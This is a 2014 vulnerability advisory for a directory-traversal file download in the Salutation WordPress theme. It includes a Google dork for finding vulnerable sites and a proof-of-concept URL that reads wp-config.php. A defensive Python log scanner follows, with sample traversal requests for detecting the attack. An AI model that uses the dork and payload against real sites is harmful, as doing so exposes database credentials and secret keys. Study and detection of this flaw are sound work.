
WordPress theme Salutation Responsive + BuddyPress Theme Arbitrary File Download Vulnerability

Author: Pro_Mast3r, Published: 04-11-2014
# WordPress theme Salutation Responsive + BuddyPress Theme Arbitrary File Download Vulnerability
# Author: Pro_Mast3r
# Date: 2014/11/2
# Google Dork: inurl:/wp-content/themes/parallelus-salutation/
# Author E-mail: Pro.Mast3r@hotmail.com
# Category: webapps
# Platform: php


# Vendor: tess
|Theme Name: Salutation Responsive + BuddyPress Theme
|Theme URI: http://themeforest.net/item/salutation-responsive-wordpress-buddypress-theme/548199
|Author: Parallelus
|Author URI: http://para.llel.us/

# PoC

http://127.0.0.1/wordpress/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php

# demo
----
Don't hack. Take the idea ;)
#exploit4arab
#IRAQ Cyber Army
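
Added example (not part of the original advisory or the theme's code): a log scan a site owner can run to find requests to the getfile.php endpoint shown in the PoC whose `file` parameter contains directory traversal, including double-encoded and backslash forms. The combined access-log format, the helper names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint taken from the advisory's PoC URL.
VULN_PATH = re.compile(
    r"/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile\.php$", re.I)
# Assumption: Apache/nginx "combined" access-log format.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
EP = "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"
# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    f'203.0.113.7 - - [04/Nov/2014:10:00:01 +0000] "GET {EP}?file=../../../../../../wp-config.php HTTP/1.1" 200 3120',
    f'203.0.113.7 - - [04/Nov/2014:10:00:05 +0000] "GET {EP}?file=%252e%252e%252f%252e%252e%252fwp-config.php HTTP/1.1" 200 3120',
    f'198.51.100.4 - - [04/Nov/2014:10:02:11 +0000] "GET {EP}?file=brochure.pdf HTTP/1.1" 200 88211',
    '198.51.100.4 - - [04/Nov/2014:10:02:30 +0000] "GET /index.php?file=../x HTTP/1.1" 404 0',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded %252e%252e%252f becomes ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(file_param):
    """True when the value climbs directories or is an absolute path."""
    value = fully_decode(file_param).replace("\\", "/")
    return ".." in value.split("/") or value.startswith("/")

def scan(lines):
    """Return (ip, status, decoded file value) for suspicious getfile.php requests."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        path = re.sub(r"/{2,}", "/", fully_decode(url.path))  # collapse "//"
        if not VULN_PATH.search(path):
            continue
        for value in parse_qs(url.query).get("file", []):
            if is_traversal(value):
                hits.append((m["ip"], int(m["status"]), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the file was probably served; if the value points at wp-config.php, rotate the database credentials and the authentication keys and salts stored there.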
